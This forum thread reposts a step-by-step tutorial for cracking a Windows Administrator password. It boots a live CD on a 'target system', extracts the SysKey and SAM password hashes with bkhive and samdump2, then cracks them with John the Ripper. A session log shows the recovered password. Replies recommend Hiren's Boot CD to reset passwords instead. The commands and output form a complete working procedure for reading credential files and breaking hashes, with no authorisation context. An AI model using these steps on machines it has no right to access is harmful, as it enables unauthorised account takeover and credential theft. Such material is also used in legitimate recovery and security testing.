Jump to content
Sign in to follow this  
Ratna

Cracking windows Administrator password

Recommended Posts

/* Tutorial By: IronGeek*/

 

 

 

Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

 

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dell’s it’s F12).

 

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

 

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

 

Step 5. Mount the local hard disk, most likely hda1:

Linux Command:

 

mount /dev/hda1

 

 

Step 6. Change the present working directory to the ramdisk so we space to work with the files we will be creating:

Linux Command:

 

cd /ramdisk/

 

 

Step 7. Auditor comes with Ncuomo’s Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use the Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32/config\SYSTEM, that’s where it is on my XP Pro test box, on some systems it will me in C:\WINNT\system32/config\SYSTEM or perhaps some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead, all later system (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:

Linux Command:

 

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt

 

 

Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:

Linux Command:

 

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt

 

 

Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I’ll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:

Linux Command:

 

gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt

 

 

Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:

Linux Command:

 

john password-hashes.txt -w:eng.txt

 

 

John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format “NT LM DES [32/32 BS]” automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the –f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:

Linux Command:

 

john password-hashes.txt -f:NT -w:eng.txt

 

 

If dictionary attacks aren’t working and you have a lot of time (as well as a fast computer) you can try John’s incremental (brute force) mode and see if it gives you better results:

Linux Command:

 

john password-hashes.txt -i:all

 

 

Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more that eight characters is pointless anyway if you have the LM hashes since there are stored as two seven byte parts (NT hashes are a different story and can be harder to crack).

 

In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is “monkey”):

Session Log saved from Auditor CD:

 

root@1[~]# mount /dev/hda1

root@1[~]# cd /ramdisk/

root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt

Bkhive ncuomo@studenti.unina.it

 

Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01

root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes

.txt

Samdump2 ncuomo@studenti.unina.it

This product includes cryptographic software written

by Eric Young (eay@cryptsoft.com)

 

No password for user Guest(501)

No V value!

root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt

root@1[ramdisk]# john password-hashes.txt -w:eng.txt

Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])

MONKEY (Administrator)

guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ

root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt

Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])

monkey (Administrator)

guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz

root@1[ramdisk]#

 

Share this post


Link to post
Share on other sites

nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

 

much easier ;)

Share this post


Link to post
Share on other sites

nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

 

much easier ;)

 

Can you tell me this process in some details?

I will be thankful for this.

Thanks

Share this post


Link to post
Share on other sites

nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

 

much easier ;)

 

Can you tell me this process in some details?

I will be thankful for this.

Thanks

 

here

http://chautari.wnso.org/forums/index.php?showtopic=9816

 

Hiren's Boot CD.. it has all the tools you need. Plus it has password reseting tool as well.

 

Very useful .

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
Sign in to follow this  

×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.